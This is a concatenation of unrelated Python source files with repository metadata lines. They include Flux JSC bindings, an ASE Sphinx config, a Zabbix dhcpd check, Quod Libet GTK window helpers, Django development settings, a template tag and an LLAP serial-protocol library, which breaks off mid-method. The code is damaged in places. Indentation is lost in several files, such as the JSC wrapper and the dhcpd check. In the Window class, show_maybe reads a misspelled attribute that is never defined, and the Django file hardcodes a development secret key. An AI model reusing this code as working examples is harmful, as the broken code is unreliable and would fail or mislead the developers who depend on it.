JSC_RDESC_NTASKS = "ntasks"
JSC_RDESC_WALLTIME = "walltime"
JSC_RDL = "rdl"
JSC_RDL_ALLOC = "rdl_alloc"
JSC_RDL_ALLOC_CONTAINED = "contained"
JSC_RDL_ALLOC_CONTAINING_RANK = "cmbdrank"
JSC_RDL_ALLOC_CONTAINED_NCORES = "cmbdncores"
JSC_PDESC = "pdesc"
JSC_PDESC_SIZE = "procsize"
JSC_PDESC_HOSTNAMES = "hostnames"
JSC_PDESC_EXECS = "executables"
JSC_PDESC_PDARRAY = "pdarray"
JSC_PDESC_RANK_PDARRAY_PID = "pid"
JSC_PDESC_RANK_PDARRAY_HINDX = "hindx"
JSC_PDESC_RANK_PDARRAY_EINDX = "eindx"
class JSCWrapper(Wrapper):
"""
Generic JSC wrapper
"""
def __init__(self):
"""Set up the wrapper interface for functions prefixed with jsc_"""
super(JSCWrapper, self).__init__(ffi,
lib,
prefixes=[
'jsc_',
])
RAW = JSCWrapper()
def query_jcb(flux_handle, jobid, key):
jcb_str = ffi.new('char *[1]')
RAW.query_jcb(flux_handle, jobid, key, jcb_str)
if jcb_str[0] == ffi.NULL:
return None
else:
return ffi.string(jcb_str[0])
def update_jcb(flux_handle, jobid, key, jcb):
    return RAW.update_jcb(flux_handle, jobid, key, jcb)
@ffi.callback('jsc_handler_f')
def jsc_notify_wrapper(jcb, arg, errnum):
if jcb != ffi.NULL:
jcb = ffi.string(jcb)
callback, real_arg = ffi.from_handle(arg)
ret = callback(jcb, real_arg, errnum)
return ret if ret is not None else 0
HANDLES = []
def notify_status(flux_handle, fun, arg):
warg = (fun, arg)
whandle = ffi.new_handle(warg)
HANDLES.append(whandle)
return RAW.notify_status(flux_handle, jsc_notify_wrapper, whandle)
def job_num2state(job_state):
ret = RAW.job_num2state(job_state)
if ret == ffi.NULL:
return None
else:
return ffi.string(ret)
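# Usage sketch (illustrative; the job id is hypothetical and flux.Flux() is
# assumed to yield a handle connected to a running broker):
if __name__ == '__main__':
    import flux
    h = flux.Flux()
    print(query_jcb(h, 1, JSC_STATE_PAIR))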
|
lipari/flux-core
|
src/bindings/python/flux/jsc.py
|
Python
|
gpl-2.0
| 2,126
|
# -*- coding: utf-8 -*-
#
# ASE documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 20 09:39:26 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
sys.path.append('.')
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['ext',
'images',
'sphinx.ext.autodoc',
'sphinx.ext.pngmath',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'contents'
# General substitutions.
project = 'ASE'
copyright = '2014, CAMd'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
try:
from ase.version import version
except ImportError:
version = '3.0.0'
# The full version, including alpha/beta/rc tags.
release = version
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
default_role = 'math'  # None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
autoclass_content = 'both'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'ase.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
html_logo = '_static/ase.ico'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/ase.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
html_file_suffix = '.html'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ASEdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
latex_paper_size = 'a4'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('contents', 'ase-manual.tex', 'ASE Manual', 'CAMd', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
latex_preamble = r'\usepackage{amsmath}'
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to gpaw.
intersphinx_mapping = {'gpaw': ('http://wiki.fysik.dtu.dk/gpaw', None),
'python': ('http://docs.python.org/2.7', None)}
# sphinx.ext.pngmath manual configuration
# ---------------------------------------
pngmath_latex_preamble = r'\usepackage{amsmath}\usepackage{amsfonts}\usepackage[active]{preview}'
# Additional arguments to give to dvipng, as a list.
# The default value is ['-gamma 1.5', '-D 110']
pngmath_dvipng_args = [
'-bgTransparent',
'-Ttight',
'--noghostscript',
'-l10',
'--depth',
'-D 136',
]
# correctly aligns the baselines
pngmath_use_preview = True
|
PHOTOX/fuase
|
ase/doc/conf.py
|
Python
|
gpl-2.0
| 6,646
|
import csv
from check import Check, CheckFail, MetricType, Metric
from lib.cache import Cache
from lib.utils import run_command, transpose_dict
class Dhcpd(Check):
name = "dhcpd"
first_ip = None
tmpfile = None
def _init_metrics(self):
self.metrics = {
"netname": Metric(MetricType.String, key="shared net name"),
"first_ip": Metric(MetricType.String, key="first ip"),
"last_ip": Metric(MetricType.String, key="last ip"),
"pool_size": Metric(MetricType.Integer, key="max"),
"active_leases": Metric(MetricType.Integer, key="cur"),
"pool_usage": Metric(MetricType.Float, key="percent"),
"expired_leases": Metric(MetricType.Integer, key="touch"),
"failover_pool_size": Metric(MetricType.Integer, key="bu"),
"failover_pool_percent": Metric(MetricType.Float, key="bu perc"),
"discovery": Metric(MetricType.Discovery, self._discovery),
}
def _get(self, metric=None, *args, **kwargs):
self.first_ip = kwargs.get("firstip", None)
self._load_data()
return self._get_value(self.metrics[metric])
def _get_value(self, metric):
if metric.type == MetricType.Discovery:
metric.callback()
return self._correct_type(metric.type, self.test_data)
key = metric.kwargs.get("key")
if self.first_ip is None:
raise CheckFail("Required parameter 'firstip' missing.")
if self.first_ip not in self.test_data:
raise CheckFail("Specified first ip (%s) not found in data" % self.first_ip)
return self._correct_type(metric.type, self.test_data[self.first_ip][key])
def _load_data(self):
self.test_data = Cache.read(self.name)
if self.test_data is not None:
return
self._refresh_stats()
self._parse_stats()
Cache.write(self.name, self.test_data)
def _refresh_stats(self):
self.tmpfile = "/tmp/zems-dhcpd-unparsed"
command = "%s -c %s -l %s -f c -o %s" % (self.config.get("dhcpd_pools_command", "/usr/bin/dhcpd-pools"),
self.config.get("dhcpd_config_file", "/etc/dhcpd/dhcpd.conf"),
self.config.get("dhcpd_leases_file", "/var/lib/dhcpd/dhcpd.leases"),
self.tmpfile)
run_command(command)
def _parse_stats(self):
fieldnames = (
"shared net name", "first ip", "last ip", "max", "cur", "percent", "touch", "t+c", "t+c perc", "bu",
"bu perc")
data = []
with open(self.tmpfile, "r") as f:
reader = csv.DictReader(f, fieldnames=fieldnames)
# Skip the first two lines (as they are useless headers)
reader.next()
reader.next()
for row in reader:
# We only need the first section, dump the rest
if ":" in row["shared net name"]:
break
data.append(row)
self.test_data = transpose_dict(data, "first ip")
def _discovery(self):
data = [{"{#FIRSTIP}": item[0], "{#LASTIP}": item[1]["last ip"]}
for item in self.test_data.iteritems()]
self.test_data = data
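        # Illustrative shape of the discovery payload (addresses are
        # hypothetical): self.test_data becomes e.g.
        #   [{"{#FIRSTIP}": "10.0.0.10", "{#LASTIP}": "10.0.0.254"}]
        # i.e. one macro dict per shared-network pool.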
|
marijngiesen/zabbix-ems
|
zems/dhcpd.py
|
Python
|
gpl-2.0
| 3,353
|
# Copyright 2012,2014 Christoph Reiter
# 2014,2017 Nick Boultbee
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import sys
import os
from typing import List
from gi.repository import Gtk, Gdk
from quodlibet import config
from quodlibet.qltk import get_top_parent, is_wayland, gtk_version, is_accel
from quodlibet.qltk.x import Button
from quodlibet.util import DeferredSignal, print_d, print_w
from quodlibet.util import connect_obj, connect_destroy
def on_first_map(window, callback, *args, **kwargs):
"""Calls callback when the passed Gtk.Window is first visible
on screen or it already is.
"""
assert isinstance(window, Gtk.Window)
if window.get_mapped():
callback(*args, **kwargs)
return False
id_ = [0]
def on_map(*otherargs):
window.disconnect(id_[0])
callback(*args, **kwargs)
id_[0] = window.connect("map", on_map)
return False
def should_use_header_bar():
settings = Gtk.Settings.get_default()
if not settings:
return False
if not hasattr(settings.props, "gtk_dialogs_use_header"):
return False
return settings.get_property("gtk-dialogs-use-header")
def fix_default_size(width, height):
# https://bugzilla.gnome.org/show_bug.cgi?id=740922
if gtk_version < (3, 19):
# fixed with 3.20:
# https://bugzilla.gnome.org/show_bug.cgi?id=756618
if width != -1:
width += min((width - 174), 56)
if height != -1:
height += 84
return (width, height)
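# Worked example: on GTK+ 3.18, fix_default_size(400, 300) returns
# (456, 384): width grows by min(400 - 174, 56) == 56 and height by 84.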
class Dialog(Gtk.Dialog):
"""A Gtk.Dialog subclass which supports the use_header_bar property
for all Gtk versions and will ignore it if header bars shouldn't be
used according to GtkSettings.
"""
def __init__(self, *args, **kwargs):
if not should_use_header_bar():
kwargs.pop("use_header_bar", None)
super(Dialog, self).__init__(*args, **kwargs)
def get_titlebar(self):
try:
# gtk+ >=3.16
return super(Dialog, self).get_titlebar()
except AttributeError:
return None
def set_default_size(self, width, height):
if self.get_titlebar():
width, height = fix_default_size(width, height)
else:
# In case we don't use a headerbar we have to add an additional
# row of buttons in the content box. To get roughly the same
# content height make the window a bit taller.
if height != -1:
height += 20
super(Dialog, self).set_default_size(width, height)
def add_icon_button(self, label, icon_name, response_id):
"""Like add_button() but allows to pass an icon name"""
button = Button(label, icon_name)
# file chooser uses grab_default() on this
button.set_can_default(True)
button.show()
self.add_action_widget(button, response_id)
return button
class Window(Gtk.Window):
"""Base window class the keeps track of all window instances.
All active instances can be accessed through Window.windows.
    Passing dialog=True as a kwarg binds Escape to close; otherwise
    ^W will close the window.
"""
windows: List[Gtk.Window] = []
    _prevent_initial_show = False
def __init__(self, *args, **kwargs):
self._header_bar = None
dialog = kwargs.pop("dialog", True)
super(Window, self).__init__(*args, **kwargs)
type(self).windows.append(self)
if dialog:
# Modal is the only way to center the window on the parent
# with wayland atm
if is_wayland():
self.set_modal(True)
self.set_type_hint(Gdk.WindowTypeHint.DIALOG)
self.set_destroy_with_parent(True)
self.set_position(Gtk.WindowPosition.CENTER_ON_PARENT)
connect_obj(self, 'destroy', type(self).windows.remove, self)
self.connect('key-press-event', self._on_key_press)
def _on_key_press(self, widget, event):
is_dialog = (self.get_type_hint() == Gdk.WindowTypeHint.DIALOG)
if (is_dialog and is_accel(event, "Escape")) or (
not is_dialog and is_accel(event, "<Primary>w")):
# Do not close the window if we edit a Gtk.CellRendererText.
# Focus the treeview instead.
if isinstance(self.get_focus(), Gtk.Entry) and \
isinstance(self.get_focus().get_parent(), Gtk.TreeView):
self.get_focus().get_parent().grab_focus()
return Gdk.EVENT_PROPAGATE
self.close()
return Gdk.EVENT_STOP
if not is_dialog and is_accel(event, "F11"):
self.toggle_fullscreen()
return Gdk.EVENT_STOP
return Gdk.EVENT_PROPAGATE
def toggle_fullscreen(self):
"""Toggle the fullscreen mode of the window depending on its current
        state. If the window isn't realized yet, it will switch to
        fullscreen once it is.
"""
window = self.get_window()
if not window:
is_fullscreen = False
else:
is_fullscreen = window.get_state() & Gdk.WindowState.FULLSCREEN
if is_fullscreen:
self.unfullscreen()
else:
self.fullscreen()
def set_default_size(self, width, height):
if self._header_bar:
width, height = fix_default_size(width, height)
super(Window, self).set_default_size(width, height)
def use_header_bar(self):
"""Try to use a headerbar, returns the widget or None in case
GTK+ is too old or headerbars are disabled (under xfce for example)
"""
assert not self._header_bar
if not should_use_header_bar():
            return None
header_bar = Gtk.HeaderBar()
header_bar.set_show_close_button(True)
header_bar.show()
old_title = self.get_title()
self.set_titlebar(header_bar)
if old_title is not None:
self.set_title(old_title)
self._header_bar = header_bar
self.set_default_size(*self.get_default_size())
return header_bar
def has_close_button(self):
"""Returns True in case we are sure that the window decorations include
a close button.
"""
if self.get_type_hint() == Gdk.WindowTypeHint.NORMAL:
return True
if os.name == "nt":
return True
if sys.platform == "darwin":
return True
if self._header_bar is not None:
return self._header_bar.get_show_close_button()
screen = Gdk.Screen.get_default()
if hasattr(screen, "get_window_manager_name"):
# X11 only
wm_name = screen.get_window_manager_name()
# Older Gnome Shell didn't show close buttons.
# We can't get the version but the GTK+ version is a good guess,
# I guess..
if wm_name == "GNOME Shell" and gtk_version < (3, 18):
return False
return True
def present(self):
"""A version of present that also works if not called from an event
handler (there is no active input event).
See https://bugzilla.gnome.org/show_bug.cgi?id=688830
"""
try:
from gi.repository import GdkX11
except ImportError:
super(Window, self).present()
else:
window = self.get_window()
if window and isinstance(window, GdkX11.X11Window):
timestamp = GdkX11.x11_get_server_time(window)
self.present_with_time(timestamp)
else:
super(Window, self).present()
def set_transient_for(self, parent):
"""Set a parent for the window.
In case parent=None, fall back to the main window.
"""
is_toplevel = parent and parent.props.type == Gtk.WindowType.TOPLEVEL
if parent is None or not is_toplevel:
if parent:
print_w("Not a toplevel window set for: %r" % self)
from quodlibet import app
parent = app.window
super(Window, self).set_transient_for(parent)
@classmethod
    def prevent_initial_show(cls, value):
        cls._prevent_initial_show = bool(value)
def show_maybe(self):
"""Show the window, except if prevent_inital_show() was called and
this is the first time.
Returns whether the window was shown.
"""
if not self._preven_inital_show:
self.show()
return not self._preven_inital_show
class PersistentWindowMixin(object):
"""A mixin for saving/restoring window size/position/maximized state"""
def enable_window_tracking(self, config_prefix, size_suffix=""):
"""Enable tracking/saving of changes and restore size/pos/maximized.
Make sure to call set_transient_for() before since position is
restored relative to the parent in this case.
config_prefix -- prefix for the config key
(prefix_size, prefix_position, prefix_maximized)
size_suffix -- optional suffix for saving the size. For cases where the
window has multiple states with different content sizes.
(example: edit tags with one song or multiple)
"""
self.__state = 0
self.__name = config_prefix
self.__size_suffix = size_suffix
self.__save_size_pos_deferred = DeferredSignal(
self.__do_save_size_pos, timeout=50, owner=self)
self.connect('configure-event', self.__configure_event)
self.connect('window-state-event', self.__window_state_changed)
self.connect('notify::visible', self.__visible_changed)
parent = self.get_transient_for()
if parent:
connect_destroy(
parent, 'configure-event', self.__parent_configure_event)
self.__restore_window_state()
def __visible_changed(self, *args):
if not self.get_visible():
# https://bugzilla.gnome.org/show_bug.cgi?id=731287
# if we restore after hide, mutter will remember for the next show
# hurray!
self.__restore_window_state()
def __restore_window_state(self):
if not is_wayland():
self.__restore_state()
self.__restore_position()
self.__restore_size()
def __conf(self, name):
if name == "size":
name += "_" + self.__size_suffix
return "%s_%s" % (self.__name, name)
def __restore_state(self):
print_d("Restore state")
if config.getint("memory", self.__conf("maximized"), 0):
self.maximize()
else:
self.unmaximize()
def __restore_position(self):
print_d("Restore position")
pos = config.get('memory', self.__conf("position"), "")
if not pos:
return
try:
x, y = map(int, pos.split())
except ValueError:
return
parent = self.get_transient_for()
if parent:
px, py = parent.get_position()
x += px
y += py
self.move(x, y)
def __restore_size(self):
print_d("Restore size")
value = config.get('memory', self.__conf("size"), "")
if not value:
return
try:
x, y = map(int, value.split())
except ValueError:
return
screen = self.get_screen()
x = min(x, screen.get_width())
y = min(y, screen.get_height())
if x >= 1 and y >= 1:
self.resize(x, y)
def __parent_configure_event(self, window, event):
# since our position is relative to the parent if we have one,
# we also need to save our position if the parent position changes
self.__do_save_pos()
return False
def __configure_event(self, window, event):
# xfwm4 resized the window before it maximizes it, which leads
# to QL remembering the wrong size. Work around that by waiting
# until configure-event settles down, at which point the maximized
# state should be set
self.__save_size_pos_deferred()
return False
def _should_ignore_state(self):
if self.__state & Gdk.WindowState.MAXIMIZED:
return True
elif self.__state & Gdk.WindowState.FULLSCREEN:
return True
elif not self.get_visible():
return True
return False
def __do_save_size_pos(self):
if self._should_ignore_state():
return
width, height = self.get_size()
value = "%d %d" % (width, height)
config.set("memory", self.__conf("size"), value)
self.__do_save_pos()
def __do_save_pos(self):
if self._should_ignore_state():
return
x, y = self.get_position()
parent = self.get_transient_for()
if parent:
px, py = parent.get_position()
x -= px
y -= py
pos_value = '%s %s' % (x, y)
config.set('memory', self.__conf("position"), pos_value)
def __window_state_changed(self, window, event):
self.__state = event.new_window_state
if self.__state & Gdk.WindowState.WITHDRAWN:
return
maximized = int(self.__state & Gdk.WindowState.MAXIMIZED)
config.set("memory", self.__conf("maximized"), maximized)
class _Unique(object):
"""A mixin for window-like classes to ensure one instance per class. """
__window = None
def __new__(klass, *args, **kwargs):
window = klass.__window
if window is None:
return super(_Unique, klass).__new__(klass, *args, **kwargs)
# Look for widgets in the args, if there is one and it has
# a new top level window, re-parent and reposition the window.
widgets = [w for w in args if isinstance(w, Gtk.Widget)]
if widgets:
parent = window.get_transient_for()
new_parent = get_top_parent(widgets[0])
if parent and new_parent and parent is not new_parent:
window.set_transient_for(new_parent)
window.hide()
window.show()
window.present()
return window
@classmethod
def is_not_unique(klass):
"""Returns True if a window instance already exists."""
return bool(klass.__window)
def __init__(self, *args, **kwargs):
if type(self).__window:
return
else:
type(self).__window = self
super(_Unique, self).__init__(*args, **kwargs)
connect_obj(self, 'destroy', self.__destroy, self)
def __destroy(self, *args):
type(self).__window = None
class UniqueWindow(_Unique, Window):
pass
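# Minimal usage sketch (illustrative): shows a plain non-dialog Window.
# Assumes a running display; quodlibet's config must be initialized before
# PersistentWindowMixin is used.
if __name__ == '__main__':
    win = Window(dialog=False)
    win.set_default_size(400, 300)
    win.connect('destroy', Gtk.main_quit)
    win.show()
    Gtk.main()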
|
ptitjes/quodlibet
|
quodlibet/qltk/window.py
|
Python
|
gpl-2.0
| 15,094
|
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# ETC_DIR = os.path.join(BASE_DIR.ancestor(1), 'etc')
APP_NAME = 'edc_base'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'dv$eox1uch^ru@&(buh(d%h+(t6y^s==zdk$&07##)ll^*2%fi'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
SITE_ID = 10
REVIEWER_SITE_ID = 0
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django_crypto_fields.apps.AppConfig',
'django_revision.apps.AppConfig',
'django_js_reverse',
'edc_device.apps.AppConfig',
'edc_protocol.apps.AppConfig',
'edc_base.apps.AppConfig',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'edc_base.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'edc_base.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
GIT_DIR = BASE_DIR
KEY_PATH = os.path.join(BASE_DIR, 'crypto_fields')
if 'test' in sys.argv:
class DisableMigrations:
def __contains__(self, item):
return True
def __getitem__(self, item):
return None
MIGRATION_MODULES = DisableMigrations()
PASSWORD_HASHERS = ('django.contrib.auth.hashers.MD5PasswordHasher', )
DEFAULT_FILE_STORAGE = 'inmemorystorage.InMemoryStorage'
|
botswana-harvard/edc-base
|
edc_base/settings.py
|
Python
|
gpl-2.0
| 3,643
|
"""
The :mod:`mappers` module is data access objects for database.
"""
|
hzxie/Sharp-V
|
mappers/__init__.py
|
Python
|
gpl-2.0
| 71
|
from django import template
from django.core.urlresolvers import reverse
register = template.Library()
@register.inclusion_tag('euscan/_favourite.html', takes_context=True)
def favourite_buttons(context, subj, *args):
context["favourite_url"] = reverse("favourite_%s" % subj, args=args)
context["unfavourite_url"] = reverse("unfavourite_%s" % subj, args=args)
return context
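# Template usage sketch (the subject and argument names are hypothetical):
# after loading this tag library, a template could render the buttons with
#   {% favourite_buttons "package" package.id %}
# which reverses the "favourite_package" / "unfavourite_package" URL names.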
|
iksaif/euscan
|
euscanwww/euscan_accounts/templatetags/euscan_accounts_helpers.py
|
Python
|
gpl-2.0
| 390
|
"""Main LLAP classes: Packet, Transceiver, Device."""
import time
import serial
import threading
LLAP_PACKET_LENGTH = 12
LLAP_PACKET_HEADER = 'a'
LLAP_PACKET_PADDING = '-'
LLAP_ACK_DELAY = 0.5
class Packet(object):
"""LLAP packet."""
def __init__(self, addr=None, data=None):
"""Create LLAP packet object."""
self._data = []
self.clear()
if addr is not None:
self.add(LLAP_PACKET_HEADER)
self.add(addr)
if data is not None:
if len(data) > LLAP_PACKET_LENGTH - 3:
raise Exception('Packet data too long!')
self.add(data)
self.pad()
def clear(self):
"""Clear the packet data."""
self._data = []
def add(self, data):
"""Add data to the packet."""
self._data.extend(list(data))
def pad(self):
"""Pad the packet to packet length."""
self._data.extend([LLAP_PACKET_PADDING] * (LLAP_PACKET_LENGTH -
len(self._data)))
def unpad(self):
"""Remove padding from the end of the packet data."""
while self._data[-1] == LLAP_PACKET_PADDING:
del self._data[-1]
@property
def data(self):
"""Return packet data as string."""
return ''.join(self._data)
def is_valid(self):
"""Return true if packet is valid."""
if len(self._data) < LLAP_PACKET_LENGTH:
return False
if self._data[0] != LLAP_PACKET_HEADER:
return False
return True
@property
def address(self):
"""Return packet address as string."""
return ''.join(self._data[1:3])
@property
def message(self):
"""Return packet message as string."""
return ''.join(self._data[3:])
class Transceiver(object):
"""LLAP serial transceiver."""
def __init__(self, port, baudrate, handler=None, debug=False):
"""Create LLAP Transceiver."""
self.handler = handler
self.debug = debug
self.packet = Packet()
self.last_char = 0
"""Maximum delay between characters - longer delay means new packet"""
self.max_delay = 0.05
self.devices = {}
self.serial = serial.Serial(port, baudrate)
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.daemon = True
time.sleep(0.05) # wait for the serial port to settle
self.start()
def reader(self):
"""Reader thread."""
try:
while True:
char = self.serial.read(1)
now = time.time()
delay = now - self.last_char
self.last_char = now
# longer delay means new packet
if delay > self.max_delay:
self.packet.clear()
self.packet.add(char)
if self.packet.is_valid():
self.receive(self.packet)
self.packet.clear()
except serial.SerialException:
raise
def start(self):
"""Start the receiver thread"""
self.receiver_thread.start()
def send(self, addr, message):
"""Send a message to addr."""
self.send_packet(Packet(addr, message))
def send_packet(self, packet):
"""Send a packet."""
if self.debug:
t = time.time()
print "%s.%03d >> %s" % (time.strftime("%H:%M:%S"),
int(round(1000*(t - int(t)))),
packet.data)
self.serial.write(packet.data)
def receive(self, packet):
"""Packet receiver handler."""
if self.debug:
t = time.time()
print "%s.%03d << %s" % (time.strftime("%H:%M:%S"),
int(round(1000*(t - int(t)))),
packet.data)
        packet.unpad()
addr = packet.address
message = packet.message
# call the device message handler if registered
if addr in self.devices:
self.devices[addr].receive(message)
# call user handler if registered
if self.handler is not None:
self.handler(addr, message)
def register_device(self, device):
"""Register device for receiver callbacks."""
self.devices[device.address] = device
def unregister_device(self, device):
"""Unregister device."""
if device.address in self.devices:
del self.devices[device.address]
class Device(object):
"""LLAP device base class."""
def __init__(self, addr, transceiver, message=None, debug=False):
""" Construct basic LLAP device."""
self._address = None
self.transceiver = transceiver
self.debug = debug
self.last_recd_message = ''
self.last_sent_time = 0
self._started = threading.Event()
self._received = threading.Event()
self._send_delay = 0
self.address = addr
if message is not None:
self.receive(message)
@property
def address(self):
"""Return device address."""
return self._address
@address.setter
def address(self, value):
"""Set the device address."""
self.transceiver.unregister_device(self)
self._address = value
self.transceiver.register_device(self)
@property
def started(self):
"""Return True if device has STARTED."""
return self._started.is_set()
@started.setter
def started(self, value):
"""Set the started flag."""
if value:
self._started.set()
else:
self._started.clear()
def last_sent_before(self):
"""Return the time in float seconds since the last message was sent."""
return time.time() - self.last_sent_time
def send(self, message, delay=None, wait=False, response=None,
timeout=1, retry=3):
"""Send message to the device, optionally waiting for the response."""
if response is not None:
wait = True
message_delay = self._send_delay - self.last_sent_before()
if message_delay > 0:
time.sleep(message_delay)
        self._send_delay = delay if delay is not None else 0
for i in range(retry):
if self.debug:
print '>>D %s' % message
self._received.clear()
self.transceiver.send(self.address, message)
self.last_sent_time = time.time()
if not wait:
return
if self._received.wait(timeout):
if response is None or \
self.last_recd_message.startswith(response):
return self.last_recd_message
return None
def receive(self, message):
"""Receiver callback.
Called from Transceiver for every received packet to the device address
"""
if self.debug:
print '<<D %s' % message
self._handle_message(message)
self.last_recd_message = message
self._received.set()
def _handle_message(self, message):
"""Handler some messages automatically."""
if message == 'STARTED':
self.started = True
self.send('ACK', delay=LLAP_ACK_DELAY)
def wait_start(self, timeout=None):
"""Wait for the device to start."""
self._started.wait(timeout)
def apver(self, timeout=1, retry=3):
"""Return LLAP version."""
msg = 'APVER'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def batt(self, timeout=1, retry=3):
"""Return battery voltage."""
msg = 'BATT'
resp = self.send(msg, response=msg, timeout=timeout, retry=retry)
if resp is not None:
return resp[len(msg):]
return None
def devtype(self, timeout=1, retry=3):
"""Return LLAP device type."""
msg = 'DEVTYPE'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def devname(self, timeout=1, retry=3):
"""Return LLAP device name."""
msg = 'DEVNAME'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def hello(self, timeout=1, retry=3):
"""Send HELLO (ping) packet."""
msg = 'HELLO'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def ser(self, timeout=1, retry=3):
"""Return device serial number."""
msg = 'SER'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def fver(self, timeout=1, retry=3):
"""Return device firmware version."""
msg = 'FVER'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def reboot(self, timeout=1, retry=3):
"""Reboot the device."""
msg = 'REBOOT'
